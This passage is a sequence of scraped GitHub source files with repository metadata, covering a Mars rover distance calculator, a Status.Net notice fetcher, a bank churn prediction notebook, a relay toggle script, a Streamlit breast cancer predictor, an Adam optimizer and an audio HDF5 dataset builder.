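    lat1, lon1, lat2, lon2 = map(math.radians, [lat1_deg, lon1_deg, lat2_deg, lon2_deg])
    d_sigma = math.acos(math.sin(lat1) * math.sin(lat2)
                        + math.cos(lat1) * math.cos(lat2) * math.cos(abs(lon1 - lon2)))
    return radius * d_sigma

# 90 degrees of longitude along the equator, Earth radius ~6371 km:
print(calc_gcd(0.0, 0.0, 0.0, 90.0, 6371.0))  # -> ~10007.5 km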
Modifies to remove global variables and make it applicable to a planent\n of any radius.\n\n Arguments:\n latitude_1 (float): latitude at which the robot starts its journey.\n latitude_2 (float): latitude at which the robot ends its journey.\n longitude_1 (float): longitude at which the robot starts its journey.\n longitude_2 (float): longitude at which the robot ends its journey.\n radius (float): the radius of the planet the robot is traversing.\n\n Returns:\n distance (float): the distance that a robot has to travel to get between two (lat, long) points.\n \"\"\"\n\n lat1, lon1, lat2, lon2 = map( math.radians, [latitude_1, longitude_1, latitude_2, longitude_2] )\n d_sigma = math.acos( math.sin(lat1) * math.sin(lat2) + math.cos(lat1) * math.cos(lat2) * math.cos(abs(lon1-lon2)))\n return ( radius * d_sigma )\n\ndef composition_sample_time(comp: str) -> int:\n \"\"\"\n This function assigns the time it takes to sample a given landing site composition.\n\n Arugments:\n comp (str): composition of the landing site concerned.\n \n Returns: \n sampling time (int): time it takes to collect a sample from the input composition.\n \"\"\"\n\n if comp == 'stony':\n return 1\n if comp == 'iron':\n return 2\n if comp == 'stony-iron':\n return 3\n\ndef main():\n \"\"\"\n This function reads in the JSON file generated by generate_sites.py and calculates the number of legs in the trip\n (hard-coded to five, in this instance) and the total time it takes to complete each leg and the trip as a whole.\n \"\"\"\n\n mars_radius = 3389.5 # km\n\n with open('landing_sites.json', 'r') as f:\n data = json.load(f)\n \n lat1 = 16.0\n lon1 = 82.0\n max_speed = 10 # km / hr\n\n legs = []\n\n for i in range(len(data['sites'])):\n temp = {}\n temp['leg'] = i+1\n lat2 = data['sites'][i]['latitude']\n lon2 = data['sites'][i]['longitude']\n dist = calc_gcd(lat1, lon1, lat2, lon2, mars_radius)\n temp['time to travel'] = dist / max_speed\n temp['time to sample'] = composition_sample_time(data['sites'][i]['composition'])\n legs.append(temp)\n\n total_time = 0\n for i in range(len(legs)):\n print(f'leg = {legs[i][\"leg\"]}, time to travel = {round(legs[i][\"time to travel\"], 2)} hr, time to sample = {legs[i][\"time to sample\"]} hr')\n total_time += legs[i]['time to travel'] + legs[i]['time to sample']\n\n print('===============================')\n print(f'number of legs = {len(legs)}, total time elapsed = {total_time} hr')\n\nif __name__ == '__main__':\n main()\n","repo_name":"lajoiekatelyn/coe322-hw","sub_path":"homework02/calculate_trip.py","file_name":"calculate_trip.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36859350095","text":"#!/usr/bin/env python\n\"\"\"Functions for getting Status.Net users' notices.\"\"\"\nimport requests, os, sys, pickle\n\n\ndef fetch_notices(username, host, use_https=False):\n \"\"\"Fetches all notices for a given user at a given host.\"\"\"\n last_id = 0\n notices = {}\n while True:\n try:\n new_notices = requests.get(\"{protocol}://{host}/api/statuses/user_timeline.json\".format(\n protocol=\"https\" if use_https else \"http\",\n host=host),\n params={\n \"screen_name\": username,\n \"max_id\": str(last_id - 1)\n })\n except requests.exceptions.ConnectionError:\n sys.stderr.write(\"GET failed with a connection error. 
Aborting \" +\n \"prematurely.\\n\")\n break\n\n if new_notices.status_code == 200:\n new_notice_data = new_notices.json()\n elif (new_notices.status_code >= 400) and (new_notices.status_code <\n 500):\n sys.stderr.write(\"GET failed with a 4xx error. Aborting \" +\n \"prematurely.\\n\")\n break\n else:\n sys.stderr.write(\"GET failed. If you're seeing this a lot, something may be wrong.\\n\")\n continue\n\n if new_notice_data == []:\n break\n else:\n for notice in new_notice_data:\n notices[int(notice[\"id\"])] = notice[\"text\"]\n last_id = int(notice[\"id\"])\n\n if last_id == 1:\n break # Just fetched id 1. Done either way.\n\n return list(notices.values())\n\n\ndef get_notices(username, host, use_https=False, force_fetch=False):\n \"\"\"Gets all notices for a given user at a given host. Will attempt to read\n from cache if possible, otherwise pass through to fetch_notices.\"\"\"\n if not force_fetch:\n try:\n with open(\"{0}/{1}.picklejar\".format(host, username), \"rb\") as picklejar:\n return pickle.load(picklejar)\n except IOError: # file bad or nonexistent\n pass # so we'll fetch\n\n notices = fetch_notices(username, host, use_https)\n\n try:\n os.mkdir(host)\n except OSError:\n pass # Directory already exists, don't care.\n try:\n with open(\"{0}/{1}.picklejar\".format(host, username), \"wb\") as picklejar:\n pickle.dump(notices, picklejar)\n except IOError:\n sys.stderr.write(\"WARNING: Couldn't pickle notices. The script will\" +\n \" most likely still work, but this may result in inefficient\" +\n \" operation.\\n\")\n\n return notices\n","repo_name":"jesskay/markov-statusnet","sub_path":"notices.py","file_name":"notices.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9129479777","text":"# checks if a clone tree is the same as the state tree\n\ndef is_valid_tree(clone_tree, state_tree):\n return sorted(clone_tree) == sorted(state_tree)\n\n#converts all clone tree to the state tree\ndef map_clone_trees(all_clone_trees, cn_clones):\n output = []\n for tree in all_clone_trees:\n updated_tree = []\n for edge in tree:\n updated_edge = []\n for i in range(2):\n updated_edge.append(cn_clones[edge[i]])\n updated_tree.append(updated_edge)\n output.append(updated_tree)\n return output\n\n#converts a single clone tree to the state tree\ndef map_single_clone_tree(clone_tree, cn_clones):\n output = []\n updated_tree = []\n for edge in clone_tree:\n updated_edge = []\n for i in range(2):\n updated_edge.append(cn_clones[edge[i]])\n updated_tree.append(updated_edge)\n output.append(updated_tree)\n return output","repo_name":"kctsai03/decifer_analysis","sub_path":"src/check_tree.py","file_name":"check_tree.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36108073513","text":"#\n# We aim to accomplist the following for this study:\n#\n# 1.Identify and visualize which factors contribute to customer churn:\n#\n# 2.Build a prediction model that will perform the following:\n#\n# =>Classify if a customer is going to churn or not\n# =>Preferably and based on model performance, choose a model that will attach a probability to the churn to make it easier for customer service to target low hanging fruits in their efforts to prevent churn\n#\n\n\n\n# https://www.kaggle.com/nasirislamsujan/bank-customer-churn-prediction\n#For data wragling\nimport numpy as np # For data manipulation\nimport 
pandas as pd # For data representation# For data representation\n\n#For data visualization\nimport matplotlib.pyplot as plt # For basic visualization\nimport seaborn as sns # For synthetic visualization\n\n\n# from sklearn.cross_validation import train_test_split # For splitting the data into training and testing\n# from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier # K neighbors classification model\nfrom sklearn.naive_bayes import GaussianNB # Gaussian Naive bayes classification model\nfrom sklearn.svm import SVC # Support Vector Classifier model\nfrom sklearn.tree import DecisionTreeClassifier # Decision Tree Classifier model\nfrom sklearn.linear_model import LogisticRegression # Logistic Regression model\nfrom sklearn.ensemble import RandomForestClassifier # Random Forest Classifier model\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, \\\n f1_score, average_precision_score, confusion_matrix, roc_curve, \\\n roc_auc_score # For checking the accuracy of the model\n\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler, StandardScaler\n\n\nfrom xgboost import XGBClassifier, plot_importance\nfrom imblearn.over_sampling import SMOTE\n\n#Read the DataFrame\ndf=pd.read_csv('Churn_Modelling.csv')\nprint(df.info())\nprint(df.head())\nprint(df.shape)\nprint(df.isnull().sum()) # Check columns list and missing values\nprint(df.describe())\n\nprint(df.dtypes)\n\nprint(df.nunique()) # Get unique count for each variable\n\n#drop unnecessary columns\n\ndf = df.drop([\"RowNumber\", \"CustomerId\", \"Surname\"], axis = 1)\n\n\n# Exploratory data analysis\n#\n# # count distribution of a categorical variable\n# df[\"Age\"].value_counts().plot.bar(figsize=(20,6))\n#\n#\n# #count distribution of a continuous variable\n# facet = sns.FacetGrid(df, hue=\"Exited\",aspect=3)\n# facet.map(sns.kdeplot,\"Age\",shade= True)\n# facet.set(xlim=(0, df[\"Age\"].max()))\n# facet.add_legend()\n#\n# plt.show()\n#\n#\n# #Pie chart. Proportion of customer churned and retained\n# labels = 'Exited', 'Retained'\n# sizes = [df.Exited[df['Exited']==1].count(), df.Exited[df['Exited']==0].count()]\n# explode = (0, 0.1)\n# fig1, ax1 = plt.subplots(figsize=(10, 8))\n# ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n# shadow=True, startangle=90)\n# ax1.axis('equal')\n# plt.title(\"Proportion of customer churned and retained\", size = 20)\n# plt.show()\n# #Output: 20.4% Exited and 79.6% Retained. This means unbalanced data\n#\n#\n#\n# #Bar chart. Frequency distribution of Exited column by Geography,Gender,HasCrCard,IsActiveMember\n# fig, axarr = plt.subplots(2, 2, figsize=(20, 12))\n# sns.countplot(x='Geography', hue='Exited', data=df, ax=axarr[0][0])\n# sns.countplot(x='Gender', hue='Exited', data=df, ax=axarr[0][1])\n# sns.countplot(x='HasCrCard', hue='Exited', data=df, ax=axarr[1][0])\n# sns.countplot(x='IsActiveMember', hue='Exited', data=df, ax=axarr[1][1])\n# plt.show()\n#\n#\n#\n# # Box-plot. 
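The get_notices function above implements a read-through cache: try the pickle on disk, fall back to fetching, then write the result back. The same pattern generalizes to a small decorator; a hedged sketch — the decorator and its names are illustrative, not part of the original script:

import os
import pickle
from functools import wraps

def pickle_cached(path_template):
    """Cache a function's return value in a pickle file keyed by its arguments."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, force_fetch=False):
            path = path_template.format(*args)
            if not force_fetch and os.path.exists(path):
                with open(path, 'rb') as f:
                    return pickle.load(f)  # cache hit
            result = func(*args)
            os.makedirs(os.path.dirname(path) or '.', exist_ok=True)
            with open(path, 'wb') as f:
                pickle.dump(result, f)  # write back for next time
            return result
        return wrapper
    return decorator

@pickle_cached('{1}/{0}.picklejar')  # host/username.picklejar, as in the original
def fetch_notices(username, host):
    return []  # stand-in for the real HTTP pagination loop above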
Relations based on the continuous data attributes\n# fig, axarr = plt.subplots(3, 2, figsize=(20, 12))\n# sns.boxplot(y='CreditScore',x = 'Exited', hue = 'Exited',data = df, ax=axarr[0][0])\n# sns.boxplot(y='Age',x = 'Exited', hue = 'Exited',data = df , ax=axarr[0][1])\n# sns.boxplot(y='Tenure',x = 'Exited', hue = 'Exited',data = df, ax=axarr[1][0])\n# sns.boxplot(y='Balance',x = 'Exited', hue = 'Exited',data = df, ax=axarr[1][1])\n# sns.boxplot(y='NumOfProducts',x = 'Exited', hue = 'Exited',data = df, ax=axarr[2][0])\n# sns.boxplot(y='EstimatedSalary',x = 'Exited', hue = 'Exited',data = df, ax=axarr[2][1])\n# plt.show()\n#\n#\n# # Creating a pivot table demonstrating the percentile Of different genders and geographical regions in exiting the bank\n# visualization_1 = df.pivot_table(\"Exited\", index=\"Gender\", columns=\"Geography\")\n# print(visualization_1)\n#\n# #\n# # #Customer with 3 or 4 products are higher chances to Churn.Analysed through swarmplot\n# # fig, axarr = plt.subplots(3, 2, figsize=(20, 12))\n# # # plt.subplots_adjust(wspace=0.3)\n# # sns.swarmplot(x = \"NumOfProducts\", y = \"Age\", hue=\"Exited\", data = df, ax= axarr[0][0])\n# # sns.swarmplot(x = \"HasCrCard\", y = \"Age\", data = df, hue=\"Exited\", ax = axarr[0][1])\n# # sns.swarmplot(x = \"IsActiveMember\", y = \"Age\", hue=\"Exited\", data = df, ax = axarr[1][0])\n# # plt.show()\n#\n#\n# #Scatter-plot. categorical vs continuous variable distribution\n# _, ax = plt.subplots(1, 2, figsize=(15, 7))\n# cmap = sns.cubehelix_palette(light=1, as_cmap=True)\n# sns.scatterplot(x = \"Age\", y = \"Balance\", hue = \"Exited\", cmap = cmap, sizes = (10, 200), data = df, ax=ax[0])\n# sns.scatterplot(x = \"Age\", y = \"CreditScore\", hue = \"Exited\", cmap = cmap, sizes = (10, 200), data = df, ax=ax[1])\n# plt.show()\n# #interpertation:\n# # 1.40 to 70 years old customers are higher chances to churn\n# # 2.Customer with CreditScore less then 400 are higher chances to churn\n#\n#\n# #swarmplot. 
descrete vs descrete variable\n# plt.figure(figsize=(8, 8))\n# sns.swarmplot(x = \"HasCrCard\", y = \"Age\", data = df, hue=\"Exited\")\n# plt.show()\n#\n#\n# #Detecting outliers using boxplot\n# plt.figure(figsize=(12,6))\n# bplot = df.boxplot(patch_artist=True)\n# plt.xticks(rotation=90)\n# plt.show()\n#\n# #checking correlation\n# plt.subplots(figsize=(11,8))\n# sns.heatmap(df.corr(), annot=True, cmap=\"RdYlBu\")\n# plt.show()\n\n\n#Predictive model building\n\n # Shuffling the dataset\nchurn_dataset = df.reindex(np.random.permutation(df.index))\n\n # Splitting feature data from the target\ndata = churn_dataset.drop(\"Exited\", axis=1)\ntarget = churn_dataset[\"Exited\"]\n\n #Scale contiuous variables\nscaler = MinMaxScaler()\n\nbumpy_features = [\"CreditScore\", \"Age\", \"Balance\",'EstimatedSalary']\n\ndf_scaled = pd.DataFrame(data = data)\ndf_scaled[bumpy_features] = scaler.fit_transform(data[bumpy_features])\n\ndf_scaled.head()\n\nX = df_scaled\n# X=data\n\n # code categorical variable values into numerical values.solves ValueError: could not convert string to float: 'Spain'\nencoder = LabelEncoder()\nX[\"Geography\"] = encoder.fit_transform(X[\"Geography\"])\nX[\"Gender\"] = encoder.fit_transform(X[\"Gender\"])\n\n #else u can use one-hot encoding\n # list_cat = ['geography', 'gender']\n # training_data = pd.get_dummies(training_data, columns = list_cat, prefix = list_cat)\n\n\n # Splitting feature data and target into training and testing\nX_train, X_test, y_train, y_test = train_test_split(X, target, test_size=0.2, random_state=0)\n\n # Creating a python list containing all defined models\nmodel = [GaussianNB(), KNeighborsClassifier(), SVC(), DecisionTreeClassifier(), RandomForestClassifier(n_estimators=5, random_state=0), LogisticRegression()]\nmodel_names = [\"Gaussian Naive bayes\", \"K-nearest neighbors\", \"Support vector classifier\", \"Decision tree classifier\", \"Random Forest\", \"Logistic Regression\",]\nfor i in range(0, 6):\n y_pred =model[i].fit(X_train, y_train).predict(X_test)\n accuracy = accuracy_score(y_pred, y_test)*100\n print(model_names[i], \":\", accuracy, \"%\")\n\n\n\n\n\n # Working with the selected model\nmodel = RandomForestClassifier(n_estimators = 100, random_state = 0)\ny_pred = model.fit(X_train, y_train).predict(X_test)\nprint(\"Our accuracy is:\", accuracy_score(y_pred, y_test)*100, \"%\")\n\n\nclf = XGBClassifier(max_depth = 10,random_state = 10, n_estimators=220, eval_metric = 'auc', min_child_weight = 3,\n colsample_bytree = 0.75, subsample= 0.9)\n\nclf.fit(X_train, y_train)\npred = clf.predict(X_test)\naccuracy_score(pred, y_test)\n\n\n#Working with unbalanced data - Over Sampling\n\nsm = SMOTE(random_state=42)\nX_res, y_res = sm.fit_sample(X, target)\nX_train, X_test, y_train, y_test = train_test_split(X_res, y_res, test_size= 0.2, random_state=7)\n\nclf = XGBClassifier(max_depth = 12,random_state=7, n_estimators=100, eval_metric = 'auc', min_child_weight = 3,\n colsample_bytree = 0.75, subsample= 0.8)\nclf.fit(X_train, y_train)\n\ny_pred = clf.predict(X_test)\nprint(\"Accuracy:\", accuracy_score(y_test, y_pred))\nprint(\"Precision:\", precision_score(y_test, y_pred))\nprint(\"Recall:\", recall_score(y_test, y_pred))\nprint(\"F1:\", f1_score(y_test, y_pred))\nprint(\"Area under precision (AUC) Recall:\", average_precision_score(y_test, y_pred))\n\n#confusion matrix (true positive,true negative,false positive,false negative count)\nprint(confusion_matrix(y_test, y_pred))\n\n\n# 
\n# three scoring methods that you can use to evaluate the predicted probabilities on your classification predictive modeling problem.\n\n# log loss score - heavily penalizes predicted probabilities far away from their expected value.\n# Brier score - penalizes proportional to the distance from the expected value.\n# area under ROC curve - summarizes the likelihood of the model predicting a higher probability for true positive cases than for true negative cases\n#\n\n# Log Loss\n# ---------\n# Log loss, also called “logistic loss,” “logarithmic loss,” or “cross entropy,” can be used as a measure for evaluating predicted probabilities.\n# Each predicted probability is compared to the actual class output value (0 or 1) and a score is calculated that penalizes the probability based on the distance from the expected value.\n# The penalty is logarithmic, giving a small score for small differences (0.1 or 0.2) and an enormous score for a large difference (0.9 or 1.0).\n# A model with perfect skill has a log loss score of 0.0.\n# In order to summarize the skill of a model using log loss, the log loss is calculated for each predicted probability, and the average loss is reported.\n\n\n\nfrom sklearn.metrics import log_loss\n\nmodel = clf\n# predict probabilities\nprobs = model.predict_proba(X_test)\n# keep the predictions for class 1 only\nprobs = probs[:, 1]\n# calculate log loss\nloss = log_loss(y_test, probs)\nprint(\"Log Loss Score:\", loss)\n\n# do the same for the other models..........\nmodel = [GaussianNB(), KNeighborsClassifier(), SVC(probability=True), DecisionTreeClassifier(), RandomForestClassifier(n_estimators=5, random_state=0), LogisticRegression()]\n\n# note: indices 0-4 line up with the ROC labels below (GaussianNB, KNN, SVC, decision tree, random forest)\ntest_labels1 = model[0].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels2 = model[1].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels3 = model[2].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels4 = model[3].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels5 = model[4].fit(X_train, y_train).predict_proba(X_test)[:, 1]\n\n\n\n\nfpr_gau, tpr_gau, _ = roc_curve(y_test, test_labels1)\nfpr_knn, tpr_knn, _ = roc_curve(y_test, test_labels2)\nfpr_svc, tpr_svc, _ = roc_curve(y_test, test_labels3)\nfpr_dt, tpr_dt, _ = roc_curve(y_test, test_labels4)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, test_labels5)\n\n\n# ROC curve\ngau_roc_auc = roc_auc_score(y_test, test_labels1, average='macro', sample_weight=None)\nknn_roc_auc = roc_auc_score(y_test, test_labels2, average='macro', sample_weight=None)\nsvc_roc_auc = roc_auc_score(y_test, test_labels3, average='macro', sample_weight=None)\ndt_roc_auc = roc_auc_score(y_test, test_labels4, average='macro', sample_weight=None)\nrf_roc_auc = roc_auc_score(y_test, test_labels5, average='macro', sample_weight=None)\n\n\nplt.figure(figsize=(12, 6), linewidth=1)\nplt.plot(fpr_gau, tpr_gau, label='GaussianNB Score: ' + str(round(gau_roc_auc, 5)))\nplt.plot(fpr_knn, tpr_knn, label='KNN Score: ' + str(round(knn_roc_auc, 5)))\nplt.plot(fpr_svc, tpr_svc, label='SVC Score: ' + str(round(svc_roc_auc, 5)))\nplt.plot(fpr_dt, tpr_dt, label='DecisionTreeClassifier Score: ' + str(round(dt_roc_auc, 5)))\nplt.plot(fpr_rf, tpr_rf, label='RandomForestClassifier Score: ' + str(round(rf_roc_auc, 5)))\n\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC Curve')\nplt.legend(loc='best')\nplt.show()\n\n    # a higher ROC AUC score is better
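\n\n# Added sketch (not in the original script): the Brier score described in the notes\n# above was left as \"do the rest\"; clf, X_test and y_test are assumed from the SMOTE section.\nfrom sklearn.metrics import brier_score_loss\nprint(\"Brier Score:\", brier_score_loss(y_test, clf.predict_proba(X_test)[:, 1]))\n\n\n# Optimization\n    #1. Cross-validation\n    #2. Hyperparameter tuning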
\n\n    # Implementing a cross-validation based approach\n\n    # Import the cross-validation module\nfrom sklearn.model_selection import cross_val_score\n\n\n# Function that tracks the mean value and the standard deviation of the chosen score\ndef cvDictGen(functions, scr, X_train=X_train, y_train=y_train, cv=5):\n    cvDict = {}\n    for func in functions:\n        cvScore = cross_val_score(func, X_train, y_train, cv=cv, scoring=scr)\n        cvDict[str(func).split('(')[0]] = [cvScore.mean(), cvScore.std()]\n\n    return cvDict\n\ncvD = cvDictGen(model, scr = 'roc_auc')\nprint(cvD)\n    # a high mean with a low standard deviation indicates a good, stable model\n\n\n    # Implementing hyperparameter tuning\n    # Import methods\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\n\n    # do the rest\n    # https://www.kaggle.com/bandiang2/prediction-of-customer-churn-at-a-bank","repo_name":"gowshalinirajalingam/Churn-Prediction","sub_path":"Churn prediction classification.py","file_name":"Churn prediction classification.py","file_ext":"py","file_size_in_byte":13600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25025160386","text":"#Relay Switch Trial Program\r\n#8/17/2013\r\n\r\n#To tell the Pi, by user selection, which relay to switch.\r\n\r\n\r\n#Global Variables\r\nstate1=0\r\nstate2=0\r\nstate3=0\r\nstate4=0\r\nuserChoice=0\r\nquitTrigger = 1\r\n\r\n#main program\r\n\r\ndef main():\r\n    relaySwitch()\r\n    \r\ndef relaySwitch():\r\n    print(\"Press 0 to quit\")\r\n    outputRelayStatus()  # Tell what state each relay is in\r\n\r\n    #Request user input\r\n    global userChoice\r\n    global quitTrigger\r\n    while (quitTrigger == 1):\r\n        userChoice = int(input(\"Enter which switch you want to change:\"))\r\n        changeOutput()\r\n        outputRelayStatus()\r\n#def queryPiRelayStatus():  #For use with actual relay\r\n    \r\ndef outputRelayStatus():  #Output Relay Status\r\n    s1=\"\"\r\n    s2=\"\"\r\n    s3=\"\"\r\n    s4=\"\"\r\n    if state1 == 0:\r\n        s1 = \"Off\"\r\n    else:\r\n        s1 = \"On\"\r\n    if state2 == 0:\r\n        s2 = \"Off\"\r\n    else:\r\n        s2 = \"On\"\r\n    if state3 == 0:\r\n        s3 = \"Off\"\r\n    else:\r\n        s3 = \"On\"\r\n    if state4 == 0:\r\n        s4 = \"Off\"\r\n    else:\r\n        s4 = \"On\"\r\n    print(\"Relay / Status: \")\r\n    print(\"  One   = \", s1)\r\n    print(\"  Two   = \", s2)\r\n    print(\"  Three = \", s3)\r\n    print(\"  Four  = \", s4)\r\n    print(\"\")\r\n\r\ndef changeOutput():  #Evaluate user choice and make change\r\n    global state1\r\n    global state2\r\n    global state3\r\n    global state4\r\n    global quitTrigger\r\n    if userChoice == 0:\r\n        quitTrigger = 0\r\n        print(\"\")\r\n        print(\"\")\r\n        print(\"\")\r\n        \r\n    elif userChoice == 1:\r\n        if state1 == 1:\r\n            state1=0\r\n        else:\r\n            state1=1\r\n    elif userChoice == 2:\r\n        if state2 == 1:\r\n            state2=0\r\n        else:\r\n            state2=1\r\n    elif userChoice == 3:\r\n        if state3 == 1:\r\n            state3=0\r\n        else:\r\n            state3=1\r\n    elif userChoice == 4:\r\n        if state4 == 1:\r\n            state4=0\r\n        else:\r\n            state4=1\r\n    else:\r\n        print(\"Number must be between 0 and 4\")\r\n    \r\n\r\nmain()\r\n","repo_name":"lriliin/Lriliin","sub_path":"RelaySwitch as module.py","file_name":"RelaySwitch as module.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71398355413","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport pickle\n\nst.set_page_config(layout='centered', page_icon='👩‍⚕️', page_title='Cancer Detection App')
\n\nst.title('Aplicación realizada por alumnos de la UAX para la detección temprana de Cáncer de Mama')\n\nst.image(Image.open('src/images/cancer.png'))\nst.sidebar.image(Image.open('src/images/uax.png'))\nst.subheader('A continuación introduce los siguientes datos para que la aplicación pueda realizar la predicción:')\n\nradio = float(st.text_input('Radio', 0))\nsimetria = float(st.text_input('Simetria', 0))\ncompacticidad = float(st.text_input('Compacticidad', 0))\ntextura = float(st.text_input('Textura', 0))\n\ndata = {'mean radius': radio,\n        'mean symmetry': simetria,\n        'mean compactness': compacticidad,\n        'mean texture': textura}\n\ndf = pd.DataFrame(data, index=[0])\n\nst.subheader('Compruebe que los datos introducidos son correctos')\n\nst.table(df)\n\nenviar = st.button('Enviar datos')\n\nif enviar:\n\n    mm = pickle.load(open('src/scaler.pkl', 'rb'))\n    lr = pickle.load(open('src/logisticregression.pkl', 'rb'))\n\n    df = mm.transform(df)\n    pred = lr.predict(df)\n\n    if pred[0] == 1:\n        st.title('''Buenas noticias\n        Con un 90.6 % de probabilidad podemos afirmar que el tumor es benigno''')\n    else:\n        st.title('''Sentimos comunicarle con un 90.6 % de probabilidad que el tumor puede ser maligno \n        Pida cita con su médico para recibir tratamiento lo antes posible''')","repo_name":"Ironhack-UAX-Bootcamp-Oct-22/Apuntes-de-Clase","sub_path":"Apuntes Clase/Week_6/Day_2/Streamlit/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42955301665","text":"from ..GPU_np import np\nfrom .Optimizer import Optimizer\n\n\nclass AdamOptimizer(Optimizer):\n    def __init__(self, beta1=0.9, beta2=0.999):\n        super().__init__()\n        self.first_moment = []\n        self.second_moment = []\n        self.beta1 = np.asarray([beta1])\n        self.beta2 = np.asarray([beta2])\n        self.pow_beta1 = np.asarray([1.0])\n        self.pow_beta2 = np.asarray([1.0])\n\n    def append(self, parameter, alpha=0):\n        super().append(parameter, alpha)\n        self.first_moment.append(np.zeros(parameter.shape))\n        self.second_moment.append(np.zeros(parameter.shape))\n\n    def update(self, learning_rate=1e-3):\n        self.pow_beta1 *= self.beta1\n        self.pow_beta2 *= self.beta2\n        for i in range(len(self.parameter_list)):\n            value, grad = self.parameter_list[i].value, self.parameter_list[i].grad\n            grad += self.alpha_list[i] * value\n            self.first_moment[i] = self.beta1 * self.first_moment[i] + (1 - self.beta1) * grad\n            self.second_moment[i] = self.beta2 * self.second_moment[i] + (1 - self.beta2) * np.square(grad)\n            # bias-corrected estimates: m_hat = m / (1 - beta1^t), v_hat = v / (1 - beta2^t)\n            first_unbias = self.first_moment[i] / (1 - self.pow_beta1)\n            second_unbias = self.second_moment[i] / (1 - self.pow_beta2)\n            value -= learning_rate * first_unbias / (np.sqrt(second_unbias) + 1e-8)\n\n    def set_data(self, data_iter):\n        super().set_data(data_iter)\n        for i in range(len(self.first_moment)):\n            self.first_moment[i] = next(data_iter)\n\n        for i in range(len(self.second_moment)):\n            self.second_moment[i] = next(data_iter)\n\n        self.beta1 = next(data_iter)\n        self.pow_beta1 = next(data_iter)\n        self.beta2 = next(data_iter)\n        self.pow_beta2 = next(data_iter)\n\n    def get_data(self):\n        return super().get_data()\\\n               + self.first_moment\\\n               + self.second_moment\\\n               + [self.beta1, self.pow_beta1, self.beta2, self.pow_beta2]
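\n\n# note: get_data and set_data are mirror images, so the optimizer state can round-trip through a checkpoint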
\n\n","repo_name":"JustinRochester/torch-CNN","sub_path":"CNN-practice/CNNs/CNN/Optimizers/Adam.py","file_name":"Adam.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18935258772","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport h5py\nimport numpy as np\nfrom sortedcontainers import SortedList\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\nimport librosa\n\n# Name of the database in your directory\ndataset_name = \"small_dataset\"\n\n# Sampling rates vary a lot in our dataset, so we normalize to 22050 (the default in a lot of work)\nsr = 22050\n# 2 channels for stereo sound; I think they use this in the paper, but I'm really not sure\nchannels = 2\n\ndata = \"train_data\"\n\ndata_path = dataset_name + '/' + data + '/'\n########################################\n# Loading the sound files\n########################################\n\npath = data_path + 'mixed/'\nfile_list = os.listdir(path)\n\nbad_index = []\nmixed_samples = []\nfor idx, file in enumerate(file_list):\n    file_path = path + file\n    y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n    if len(y) == 88200:  # check that the file has the right length (duration * sr)\n        mixed_samples.append(y)\n    else:\n        print(idx, \"wrong length audio file\")  # should just be a check that doesn't get triggered if we have correct data\n        bad_index.append(idx)\n    \n\npath = data_path + 'clean/'\nfile_list = os.listdir(path)\n\nclean_samples = []\nfor idx, file in enumerate(file_list):\n    file_path = path + file\n    y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n    if idx not in bad_index:\n        clean_samples.append(y)\n\n    \npath = data_path + 'noise/'\nfile_list = os.listdir(path)\n\nnoise_samples = []\nfor idx, file in enumerate(file_list):\n    file_path = path + file\n    y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n    if idx not in bad_index:\n        noise_samples.append(y)\n    \n########################################\n# Create HDF and save the sounds there\n########################################\n\n\npartition = \"small_\" + data\n\nhdf_dir = '\\\\hdf_files'\nprint(hdf_dir)\n\nos.makedirs(os.getcwd() + hdf_dir, mode=0o777, exist_ok=True)\nhdf_file = os.path.join(os.getcwd() + hdf_dir, partition + \".hdf5\")\n\n\ninstruments = [\"speech\", \"noise\"]\n\n\nwith h5py.File(hdf_file, \"w\") as f:\n    f.attrs[\"sr\"] = sr\n    f.attrs[\"channels\"] = channels\n    f.attrs[\"instruments\"] = instruments\n    \n    for idx, mix_audio in enumerate(mixed_samples):\n        \n        clean_audio = clean_samples[idx]\n        noise_audio = noise_samples[idx]\n        # Get the separate samples in the right format\n        source_audios = []\n        source_audios.append(clean_audio)\n        source_audios.append(noise_audio)\n        source_audios = np.concatenate(source_audios, axis=0)\n        # Create file\n        grp = f.create_group(str(idx))\n        grp.create_dataset(\"inputs\", shape=mix_audio.shape, dtype=mix_audio.dtype, data=mix_audio)\n        grp.create_dataset(\"targets\", shape=source_audios.shape, dtype=source_audios.dtype, data=source_audios)\n        grp.attrs[\"length\"] = mix_audio.shape[0]\n        grp.attrs[\"target_length\"] = 